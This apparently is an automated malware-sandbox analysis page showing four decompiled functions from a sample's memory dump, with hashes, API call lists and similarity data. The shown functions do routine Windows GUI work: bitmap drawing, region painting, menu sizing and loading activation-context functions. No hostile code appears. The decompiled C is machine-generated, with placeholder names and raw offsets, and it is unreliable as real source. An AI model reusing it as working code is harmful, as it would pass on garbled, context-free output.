                  • Instruction ID: 5f500491e68d1a194ec1947d030eacbd13a265cd7d1864792aed4f71f97c6faa
                  • Opcode Fuzzy Hash: 49575fe09fa3281def47276dcee75f14851e47962da65c3dd0b0baef01b08a45
                  • Instruction Fuzzy Hash: 4F91E2B1C0010DAADF11EFE2CD819EEBBB9FF48348F20412AB105661A1DB395E55DB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00414C81, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 194windowUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00414C81(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t115;
				void* _t121;
				intOrPtr _t162;
				void* _t170;
				void* _t171;

				_t171 = __eflags;
				_push(0x58);
				E0042922B(E00438DBE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t170 - 0x3c)) = 0x43e78c;
				 *(_t170 - 0x38) = 0;
				 *((intOrPtr*)(_t170 - 0x34)) = 0;
				 *((intOrPtr*)(_t170 - 0x30)) = 0;
				 *(_t170 - 4) = 0;
				 *((intOrPtr*)(_t170 - 0x4c)) = 0x43e78c;
				 *(_t170 - 0x48) = 0;
				 *((intOrPtr*)(_t170 - 0x44)) = 0;
				 *((intOrPtr*)(_t170 - 0x40)) = 0;
				_t162 = 0x43ea08;
				 *((intOrPtr*)(_t170 - 0x18)) = 0;
				 *((intOrPtr*)(_t170 - 0x1c)) = 0x43ea08;
				 *(_t170 - 4) = 2;
				_push(GetSysColor(0x14));
				E00414C3E(0, _t170 - 0x2c, 0x43ea08, GetSysColor, _t171);
				 *(_t170 - 4) = 3;
				_push(GetSysColor(0x10));
				E00414C3E(0, _t170 - 0x24, 0x43ea08, GetSysColor, _t171);
				 *(_t170 - 4) = 4;
				if(E004149F6(_t170 - 0x3c, 0) != 0 && E004149F6(_t170 - 0x4c, 0) != 0) {
					_t168 =  *((intOrPtr*)(_t170 + 8));
					GetObjectW( *( *((intOrPtr*)(_t170 + 8)) + 4), 0x18, _t170 - 0x64);
					E00414990( *((intOrPtr*)(_t170 + 0xc)));
					if(E004149CC( *((intOrPtr*)(_t170 + 0xc)),  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x54) & 0x0000ffff,  *(_t170 - 0x52) & 0x0000ffff, 0) != 0 && E004149CC(_t170 - 0x1c,  *(_t170 - 0x60),  *(_t170 - 0x5c), 1, 1, 0) != 0) {
						 *((intOrPtr*)(_t170 + 8)) = E00414B47(_t170 - 0x3c, _t168);
						_t115 = E00414B47(_t170 - 0x4c, _t170 - 0x1c);
						 *((intOrPtr*)(_t170 - 0x14)) = _t115;
						if( *((intOrPtr*)(_t170 + 8)) != 0 && _t115 != 0) {
							 *((intOrPtr*)(_t170 - 0x10)) = E00413F1D(GetPixel( *(_t170 - 0x38), 0, 0), _t170 - 0x3c, _t116);
							E00413F1D(BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0xcc0020), _t170 - 0x3c, 0xffffff);
							BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0x1100a6);
							_t121 = E00414B47(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc)));
							_t178 = _t121;
							if(_t121 != 0) {
								E00413F1D(E00421C10(_t170 - 0x3c, 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *((intOrPtr*)(_t170 + 0x10))), _t170 - 0x3c, 0xffffff);
								 *((intOrPtr*)(_t170 + 0xc)) = E00414A99(_t170 - 0x3c, _t170 - 0x2c);
								BitBlt( *(_t170 - 0x38), 1, 1,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
								E00414A99(_t170 - 0x3c, _t170 - 0x24);
								BitBlt( *(_t170 - 0x38), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
								E00413F1D(E00414A99(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc))), _t170 - 0x3c,  *((intOrPtr*)(_t170 - 0x10)));
							}
							E00414B47(_t170 - 0x4c,  *((intOrPtr*)(_t170 - 0x14)));
							E00414B47(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 8)));
							_t162 = 0x43ea08;
						}
					}
				}
				 *(_t170 - 4) = 3;
				 *((intOrPtr*)(_t170 - 0x24)) = 0x43e9f8;
				E00414B63(0, _t170 - 0x24, _t162, 0x43e9f8, _t178);
				 *(_t170 - 4) = 2;
				 *((intOrPtr*)(_t170 - 0x2c)) = 0x43e9f8;
				E00414B63(0, _t170 - 0x2c, _t162, 0x43e9f8, _t178);
				 *(_t170 - 4) = 1;
				 *((intOrPtr*)(_t170 - 0x1c)) = _t162;
				E00414B63(0, _t170 - 0x1c, _t162, 0x43e9f8, _t178);
				 *(_t170 - 4) = 0;
				E004146E5(_t170 - 0x4c);
				 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
				return E00429303(E004146E5(_t170 - 0x3c));
			}








                  0x00414c81
                  0x00414c81
                  0x00414c88
                  0x00414c94
                  0x00414c97
                  0x00414c9a
                  0x00414c9d
                  0x00414ca0
                  0x00414ca3
                  0x00414ca6
                  0x00414ca9
                  0x00414cac
                  0x00414caf
                  0x00414cb4
                  0x00414cb7
                  0x00414cc2
                  0x00414cc8
                  0x00414ccc
                  0x00414cd3
                  0x00414cd9
                  0x00414cdd
                  0x00414ce6
                  0x00414cf1
                  0x00414d08
                  0x00414d14
                  0x00414d1d
                  0x00414d3d
                  0x00414d67
                  0x00414d71
                  0x00414d76
                  0x00414d7c
                  0x00414dae
                  0x00414dc7
                  0x00414de1
                  0x00414de9
                  0x00414dee
                  0x00414df0
                  0x00414e09
                  0x00414e25
                  0x00414e35
                  0x00414e3e
                  0x00414e54
                  0x00414e67
                  0x00414e67
                  0x00414e72
                  0x00414e7d
                  0x00414e82
                  0x00414e82
                  0x00414d7c
                  0x00414d3d
                  0x00414e8f
                  0x00414e93
                  0x00414e96
                  0x00414e9e
                  0x00414ea2
                  0x00414ea5
                  0x00414ead
                  0x00414eb1
                  0x00414eb4
                  0x00414ebc
                  0x00414ebf
                  0x00414ec4
                  0x00414ed5

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C88
                  • GetSysColor.USER32(00000014), ref: 00414CC6
                    • Part of subcall function 00414C3E: __EH_prolog3.LIBCMT ref: 00414C45
                    • Part of subcall function 00414C3E: CreateSolidBrush.GDI32(?), ref: 00414C60
                  • GetSysColor.USER32(00000010), ref: 00414CD7
                    • Part of subcall function 004149F6: CreateCompatibleDC.GDI32(?), ref: 00414A09
                  • GetObjectW.GDI32(?,00000018,?), ref: 00414D14
                    • Part of subcall function 004149CC: CreateBitmap.GDI32(?,?,?,?,?), ref: 004149E3
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00414D8F
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F3B
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F48
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00414DBC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 00414DE1
                    • Part of subcall function 00421C10: SetBkColor.GDI32(?,?), ref: 00421C21
                    • Part of subcall function 00421C10: ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00421C53
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,00000000), ref: 00414ABF
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,?), ref: 00414AD5
                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 00414E35
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 00414E54
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$CreateObject$H_prolog3Select$BitmapBrushCompatiblePixelSolidText
                  • String ID: 6AA$BAA
                  • API String ID: 3190328746-1136626083
                  • Opcode ID: 1938a53352adc42c069018131827be4703896d88b23682facd8ae4c430c7562a
                  • Instruction ID: 0111c0a72b243d836fdaceae801d860e5bcb95e3b8eb1b6f562e39f6b05ac663
                  • Opcode Fuzzy Hash: 1938a53352adc42c069018131827be4703896d88b23682facd8ae4c430c7562a
                  • Instruction Fuzzy Hash: AD7123B1C0020DBADF05EFE1DC81AEEBB79AF58308F10802AF515761A1DB395E95DB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00421CD5, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00421CD5(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t131;
				intOrPtr _t195;
				intOrPtr* _t223;
				void* _t226;

				_push(0x38);
				E0042922B(E004395FB, __ebx, __edi, __esi);
				_t223 = __ecx;
				 *((intOrPtr*)(_t226 - 0x30)) = 0;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x440a28;
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x28)) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x440a28;
				 *((intOrPtr*)(_t226 - 0x20)) = 0;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x440a28;
				 *(_t226 - 4) = 2;
				E00421ADD(_t226 - 0x2c,  *(_t226 + 8));
				E00415CDB(_t226 - 0x44,  *(_t226 + 8));
				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
				E00421ADD(_t226 - 0x24, _t226 - 0x44);
				E00414938(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
				E00421B1B(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
				_t228 =  *((intOrPtr*)(_t226 + 0x20));
				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
					 *((intOrPtr*)(_t226 + 0x20)) = E00421B6B(0, _t223, 0x440a28, _t228);
				}
				_t195 =  *((intOrPtr*)(_t226 + 0x20));
				if((0 | _t195 != 0x00000000) == 0) {
					E00413DD0(_t195);
				}
				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
				}
				 *((intOrPtr*)(_t226 - 0x18)) = 0;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x440a28;
				 *((intOrPtr*)(_t226 - 0x10)) = 0;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x440a28;
				 *(_t226 - 4) = 4;
				if( *(_t226 + 0x14) != 0) {
					E00414938(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
					E00421AFB(_t226 - 0x2c,  *(_t226 + 0x14));
					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
					E00421AFB(_t226 - 0x24, _t226 - 0x44);
					E00421B1B(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
						E00414938(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
						E00421B1B(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
					E004144B7(_t223, _t226 - 0x1c);
					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
					 *(_t226 + 0x14) = E00414A99(_t223,  *((intOrPtr*)(_t226 + 0x24)));
					E00421B4A(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
					E00414A99(_t223,  *(_t226 + 0x14));
				}
				_t131 = _t226 - 0x14;
				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
					_t131 = _t226 - 0x34;
				}
				E004144B7(_t223, _t131);
				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
				 *(_t226 + 0x14) = E00414A99(_t223,  *((intOrPtr*)(_t226 + 0x20)));
				E00421B4A(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
				_t238 =  *(_t226 + 0x14);
				if( *(_t226 + 0x14) != 0) {
					E00414A99(_t223,  *(_t226 + 0x14));
				}
				E004144B7(_t223, 0);
				 *(_t226 - 4) = 3;
				 *((intOrPtr*)(_t226 - 0x14)) = 0x440a28;
				E00414B63(0, _t226 - 0x14, _t223, 0x440a28, _t238);
				 *(_t226 - 4) = 2;
				 *((intOrPtr*)(_t226 - 0x1c)) = 0x440a28;
				E00414B63(0, _t226 - 0x1c, _t223, 0x440a28, _t238);
				 *(_t226 - 4) = 1;
				 *((intOrPtr*)(_t226 - 0x24)) = 0x440a28;
				E00414B63(0, _t226 - 0x24, _t223, 0x440a28, _t238);
				 *(_t226 - 4) = 0;
				 *((intOrPtr*)(_t226 - 0x2c)) = 0x440a28;
				E00414B63(0, _t226 - 0x2c, _t223, 0x440a28, _t238);
				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t226 - 0x34)) = 0x440a28;
				return E00429303(E00414B63(0, _t226 - 0x34, _t223, 0x440a28,  *(_t226 - 4)));
			}







                  0x00421cd5
                  0x00421cdc
                  0x00421ce1
                  0x00421cea
                  0x00421ced
                  0x00421cf0
                  0x00421cf3
                  0x00421cf6
                  0x00421cf9
                  0x00421cfc
                  0x00421d05
                  0x00421d09
                  0x00421d14
                  0x00421d29
                  0x00421d37
                  0x00421d44
                  0x00421d57
                  0x00421d69
                  0x00421d6e
                  0x00421d71
                  0x00421d78
                  0x00421d78
                  0x00421d7b
                  0x00421d87
                  0x00421d89
                  0x00421d89
                  0x00421d91
                  0x00421d93
                  0x00421d93
                  0x00421d96
                  0x00421d99
                  0x00421d9c
                  0x00421d9f
                  0x00421da2
                  0x00421da9
                  0x00421dbd
                  0x00421dc8
                  0x00421dd4
                  0x00421dea
                  0x00421df8
                  0x00421e05
                  0x00421e17
                  0x00421e28
                  0x00421e38
                  0x00421e4a
                  0x00421e4a
                  0x00421e28
                  0x00421e5b
                  0x00421e68
                  0x00421e75
                  0x00421e82
                  0x00421ea0
                  0x00421eaa
                  0x00421eaa
                  0x00421eaf
                  0x00421eb5
                  0x00421eb7
                  0x00421eb7
                  0x00421ebd
                  0x00421eca
                  0x00421ed7
                  0x00421ef5
                  0x00421efa
                  0x00421efd
                  0x00421f04
                  0x00421f04
                  0x00421f0c
                  0x00421f14
                  0x00421f18
                  0x00421f1b
                  0x00421f23
                  0x00421f27
                  0x00421f2a
                  0x00421f32
                  0x00421f36
                  0x00421f39
                  0x00421f41
                  0x00421f44
                  0x00421f47
                  0x00421f4c
                  0x00421f53
                  0x00421f60

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00421CDC
                    • Part of subcall function 00421ADD: CreateRectRgnIndirect.GDI32(?), ref: 00421AE8
                    • Part of subcall function 00415CDB: CopyRect.USER32(?,?), ref: 00415CE7
                  • InflateRect.USER32(?,?,?), ref: 00421D29
                  • IntersectRect.USER32(?,?,?), ref: 00421D37
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421D4D
                    • Part of subcall function 00421B1B: CombineRgn.GDI32(?,?,?,?), ref: 00421B40
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421DB3
                  • CopyRect.USER32(?,?), ref: 00421DD4
                  • InflateRect.USER32(?,?,?), ref: 00421DEA
                  • IntersectRect.USER32(?,?,?), ref: 00421DF8
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00421E2E
                    • Part of subcall function 00421B6B: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00421BB3
                    • Part of subcall function 00421B6B: CreatePatternBrush.GDI32(00000000), ref: 00421BC0
                    • Part of subcall function 00421B6B: DeleteObject.GDI32(00000000), ref: 00421BCC
                    • Part of subcall function 00421B4A: PatBlt.GDI32(?,?,?,?,?,?), ref: 00421B61
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,00000000), ref: 00414ABF
                    • Part of subcall function 00414A99: SelectObject.GDI32(?,?), ref: 00414AD5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: HAA
                  • API String ID: 714730959-1769015848
                  • Opcode ID: 8c00e2d2a4cdf5e7b88d2cffe88812e096eafe5aee1730032a85124b1133b760
                  • Instruction ID: 9eed31c3002cd6e718cbcd265c8a4d8d7723fb3af71510aa55d37fd1cbd0f69c
                  • Opcode Fuzzy Hash: 8c00e2d2a4cdf5e7b88d2cffe88812e096eafe5aee1730032a85124b1133b760
                  • Instruction Fuzzy Hash: 719118B1A0010AEFCF01DFE5DA859EEBBB9BF58304F50411AF505A3251DB38AE05CB69
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0041F89A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 113windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041F89A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				int _t60;
				int _t62;
				intOrPtr _t65;
				void* _t73;
				struct tagMENUITEMINFOW _t84;
				int _t87;
				intOrPtr _t104;
				intOrPtr _t109;
				void* _t111;

				_push(0x54);
				E0042922B(E0043942F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t111 - 0x10)) = __ecx;
				_t104 =  *((intOrPtr*)(_t111 + 8));
				_t50 =  *((intOrPtr*)(_t104 + 0x14));
				if(_t50 == 0) {
					 *(_t111 - 0x18) = GetSystemMetrics(0x32) + 2;
					_t109 = GetSystemMetrics(0x31) + 2;
					__eflags = _t109;
				} else {
					GetObjectW( *(_t50 + 4), 0x18, _t111 - 0x30);
					 *(_t111 - 0x18) =  *((intOrPtr*)(_t111 - 0x28)) + 2;
					_t109 =  *((intOrPtr*)(_t111 - 0x2c)) + 2;
				}
				E00404820(_t111 + 8);
				 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
				_t84 = 0x30;
				E004281D0(_t104, _t111 - 0x60, 0, _t84);
				 *(_t111 - 0x60) = _t84;
				 *((intOrPtr*)(_t111 - 0x5c)) = 0x40;
				_t60 = GetMenuItemInfoW( *( *((intOrPtr*)(_t111 - 0x10)) + 4),  *(_t104 + 8), 0, _t111 - 0x60);
				_t116 = _t60;
				if(_t60 != 0) {
					_t65 = E00405860(_t111 + 8, _t116,  *((intOrPtr*)(_t111 - 0x38)));
					 *((intOrPtr*)(_t111 - 0x38)) =  *((intOrPtr*)(_t111 - 0x38)) + 1;
					 *((intOrPtr*)(_t111 - 0x3c)) = _t65;
					_t87 = GetMenuItemInfoW( *( *((intOrPtr*)(_t111 - 0x10)) + 4),  *(_t104 + 8), 0, _t111 - 0x60);
					E0040E100(_t87, _t111 + 8, _t104, 0xffffffff);
					_t117 = _t87;
					if(_t87 != 0) {
						_push(0);
						E0041478D(_t87, _t111 - 0x2c, _t104, _t109, _t117);
						 *(_t111 - 4) = 1;
						_t73 = E00414A99(_t111 - 0x2c,  *((intOrPtr*)(_t111 - 0x10)) + 8);
						E0041AA1C(_t111 - 0x2c, _t111 - 0x14, _t111 + 8);
						E00414A99(_t111 - 0x2c, _t73);
						_t109 = _t109 +  *((intOrPtr*)(_t111 - 0x14)) + 3;
						 *(_t111 - 4) = 0;
						E004147E1(_t73, _t111 - 0x2c, _t104, _t109,  *((intOrPtr*)(_t111 - 0x10)) + 8);
					}
				}
				if(GetSystemMetrics(0xf) <=  *(_t111 - 0x18)) {
					_t62 =  *(_t111 - 0x18);
				} else {
					_t62 = GetSystemMetrics(0xf);
				}
				 *(_t104 + 0x10) = _t62;
				 *((intOrPtr*)(_t104 + 0xc)) = _t109;
				return E00429303(E004055F0( *((intOrPtr*)(_t111 + 8)) + 0xfffffff0));
			}













                  0x0041f89a
                  0x0041f8a1
                  0x0041f8a6
                  0x0041f8a9
                  0x0041f8ac
                  0x0041f8b1
                  0x0041f8e1
                  0x0041f8e9
                  0x0041f8e9
                  0x0041f8b3
                  0x0041f8bc
                  0x0041f8cb
                  0x0041f8ce
                  0x0041f8ce
                  0x0041f8ed
                  0x0041f8f2
                  0x0041f8f8
                  0x0041f900
                  0x0041f918
                  0x0041f921
                  0x0041f928
                  0x0041f92a
                  0x0041f92c
                  0x0041f934
                  0x0041f939
                  0x0041f940
                  0x0041f956
                  0x0041f958
                  0x0041f95d
                  0x0041f95f
                  0x0041f961
                  0x0041f966
                  0x0041f975
                  0x0041f979
                  0x0041f98b
                  0x0041f994
                  0x0041f99f
                  0x0041f9a3
                  0x0041f9a7
                  0x0041f9a7
                  0x0041f95f
                  0x0041f9b9
                  0x0041f9c1
                  0x0041f9bb
                  0x0041f9bd
                  0x0041f9bd
                  0x0041f9ca
                  0x0041f9cd
                  0x0041f9da

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F8A1
                  • GetObjectW.GDI32(?,00000018,?), ref: 0041F8BC
                  • GetSystemMetrics.USER32(00000032), ref: 0041F8DB
                  • GetSystemMetrics.USER32(00000031), ref: 0041F8E4
                  • _memset.LIBCMT ref: 0041F900
                  • GetMenuItemInfoW.USER32 ref: 0041F928
                  • GetMenuItemInfoW.USER32(00000000,?,00000000,?), ref: 0041F94F
                  • GetSystemMetrics.USER32(0000000F), ref: 0041F9B4
                  • GetSystemMetrics.USER32(0000000F), ref: 0041F9BD
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$InfoItemMenu$H_prolog3Object_memset
                  • String ID: @
                  • API String ID: 3341327673-2766056989
                  • Opcode ID: dfeea2197fba2efaec2f6360b973d6dd7e00af18c89edb1dd90b4de57aec6b85
                  • Instruction ID: fa553f11ab48a0546bf53c0ed4f1d4cd1c58e2803b6d83318a96144376cf12d7
                  • Opcode Fuzzy Hash: dfeea2197fba2efaec2f6360b973d6dd7e00af18c89edb1dd90b4de57aec6b85
                  • Instruction Fuzzy Hash: 5D417171900219AFCB04EFE4DC85BEEB7B8FF18304F04412AF615A7282DB74A945CB99
                  Uniqueness

                  Uniqueness Score: 12.89%

                  Function 0041CA2D, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041CA2D(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __ebp;
				intOrPtr _t5;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t18;
				char _t22;
				intOrPtr _t24;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t26;

				_push(__ecx);
				_t5 = __ecx;
				_t16 = _a4;
				 *((intOrPtr*)(__ecx)) = _a4;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_v8 = __ecx;
				_t22 =  *0x44f9b0; // 0x0
				if(_t22 == 0) {
					_t18 = GetModuleHandleW(L"KERNEL32");
					if(_t18 == 0) {
						L2:
						E00413DD0(_t16);
					}
					 *0x44f9a0 = GetProcAddress(_t18, "CreateActCtxW");
					 *0x44f9a4 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x44f9a8 = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x44f9ac = _t10;
					_t24 =  *0x44f9a0; // 0x0
					if(_t24 == 0) {
						__eflags =  *0x44f9a4; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x44f9a8; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(_t10 != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t25 =  *0x44f9a4; // 0x0
						if(_t25 == 0) {
							goto L2;
						} else {
							_t26 =  *0x44f9a8; // 0x0
							if(_t26 == 0) {
								goto L2;
							} else {
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x44f9b0 = 1;
				}
				return _t5;
			}












                  0x0041ca32
                  0x0041ca33
                  0x0041ca35
                  0x0041ca3b
                  0x0041ca3d
                  0x0041ca40
                  0x0041ca43
                  0x0041ca49
                  0x0041ca5c
                  0x0041ca60
                  0x0041ca62
                  0x0041ca62
                  0x0041ca62
                  0x0041ca7b
                  0x0041ca88
                  0x0041ca95
                  0x0041ca9a
                  0x0041ca9c
                  0x0041ca9d
                  0x0041caa3
                  0x0041caa9
                  0x0041cac1
                  0x0041cac7
                  0x00000000
                  0x0041cac9
                  0x0041cac9
                  0x0041cacf
                  0x00000000
                  0x0041cad1
                  0x0041cad1
                  0x0041cad3
                  0x00000000
                  0x00000000
                  0x0041cad3
                  0x0041cacf
                  0x0041caab
                  0x0041caab
                  0x0041cab1
                  0x00000000
                  0x0041cab3
                  0x0041cab3
                  0x0041cab9
                  0x00000000
                  0x0041cabb
                  0x0041cabd
                  0x00000000
                  0x0041cabf
                  0x0041cabd
                  0x0041cab9
                  0x0041cab1
                  0x0041cad5
                  0x0041cad8
                  0x0041cad8
                  0x0041cae1

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041CA56
                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0041CA73
                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 0041CA80
                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 0041CA8D
                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 0041CA9A
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                  • API String ID: 667068680-2424895508
                  • Opcode ID: d5e5d5b353d9dc641aa9d336ee5124403e64daa888dfe1080729ee1a404a8e80
                  • Instruction ID: b16c5fe8cb7ee5c341957e0244876cc4e70becec17aa51119e1388a184e508b3
                  • Opcode Fuzzy Hash: d5e5d5b353d9dc641aa9d336ee5124403e64daa888dfe1080729ee1a404a8e80
                  • Instruction Fuzzy Hash: 881142B5D85358BECB21EF69ACC5A577EA4EA56750714013FE104C7231E3784988CA1E
                  Uniqueness

                  Uniqueness Score: 0.28%

